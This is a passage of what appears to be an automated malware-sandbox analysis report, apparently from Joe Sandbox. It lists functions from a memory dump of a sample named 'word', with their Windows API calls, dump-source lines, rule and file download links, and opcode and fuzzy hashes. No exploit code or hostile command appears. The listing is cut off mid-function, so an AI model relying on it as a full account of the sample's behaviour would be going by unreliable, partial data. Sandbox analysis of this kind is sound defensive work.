                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                            • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                                            • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                            • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                                            Function 0045D070 Relevance: 6.1, APIs: 4, Instructions: 100fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000), ref: 0045D10A
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                            • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000), ref: 0045D16A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 3321077145-0
                                                                            • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                            • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                            • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                            • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                            Function 004613E0 Relevance: 6.1, APIs: 4, Instructions: 90windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                            • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                            • __itow.LIBCMT ref: 00461461
                                                                            • __itow.LIBCMT ref: 004614AB
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$__itow$_wcslen
                                                                            • String ID:
                                                                            • API String ID: 2875217250-0
                                                                            • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                            • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                            • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                            • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                            Function 004727F8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 00472806
                                                                              • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                              • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32(00000000), ref: 00443F18
                                                                              • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                            • GetCaretPos.USER32(?), ref: 0047281A
                                                                            • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                            • GetForegroundWindow.USER32 ref: 0047285C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                            • String ID:
                                                                            • API String ID: 2759813231-0
                                                                            • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                            • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                            • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                            • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                            Function 0047721A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772A9
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772C0
                                                                            • SetLayeredWindowAttributes.USER32 ref: 004772D0
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$AttributesLayered
                                                                            • String ID:
                                                                            • API String ID: 2169480361-0
                                                                            • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                            • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                            • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                            • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                            Function 00448C8B Relevance: 6.1, APIs: 4, Instructions: 73windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32 ref: 00448CB8
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                            • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 312131281-0
                                                                            • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                            • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                            • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                            • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                            Function 004588B0 Relevance: 6.1, APIs: 4, Instructions: 67networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • select.WSOCK32 ref: 0045890A
                                                                            • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                            • accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastacceptselect
                                                                            • String ID:
                                                                            • API String ID: 385091864-0
                                                                            • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                            • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                            • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                            • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                            Function 00438D4E Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                            • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                            • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                            • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                            Function 0043362D Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateWindowExW.USER32 ref: 0043367E
                                                                            • GetStockObject.GDI32(00000011), ref: 00433695
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                            • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateMessageObjectSendShowStock
                                                                            • String ID:
                                                                            • API String ID: 1358664141-0
                                                                            • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                            • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                            • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                            • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                            Function 0044419B Relevance: 6.1, APIs: 4, Instructions: 53synchronizationthreadwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                            • MessageBoxW.USER32 ref: 004441F6
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                            • String ID:
                                                                            • API String ID: 2880819207-0
                                                                            • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                            • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                            • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                            • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                            Function 0043401C Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 00434037
                                                                            • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                            • ScreenToClient.USER32(?,?), ref: 00434085
                                                                            • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                            • String ID:
                                                                            • API String ID: 357397906-0
                                                                            • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                            • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                            • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                            • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                            Function 00424E33 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                            • Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
                                                                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                            • Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85
                                                                            Function 00436A1D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __wsplitpath.LIBCMT ref: 00436A45
                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                            • __wsplitpath.LIBCMT ref: 00436A6C
                                                                            • __wcsicoll.LIBCMT ref: 00436A93
                                                                            • __wcsicoll.LIBCMT ref: 00436AB0
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                            • String ID:
                                                                            • API String ID: 1187119602-0
                                                                            • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                            • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                            • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                            • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                            Function 00437AFE Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1597257046-0
                                                                            • Opcode ID: 9080831c6e3327375fa8e2590c4296ec00bc2fee719a816d2a7a1c5fc2e8ee26
                                                                            • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                            • Opcode Fuzzy Hash: 9080831c6e3327375fa8e2590c4296ec00bc2fee719a816d2a7a1c5fc2e8ee26
                                                                            • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                            Function 004555D6 Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteDestroyObject$IconWindow
                                                                            • String ID:
                                                                            • API String ID: 3349847261-0
                                                                            • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                            • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                            • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                            • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                            Function 0044B600 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                            • String ID:
                                                                            • API String ID: 2223660684-0
                                                                            • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                            • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                            • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                            • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                            Function 00447268 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                            • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
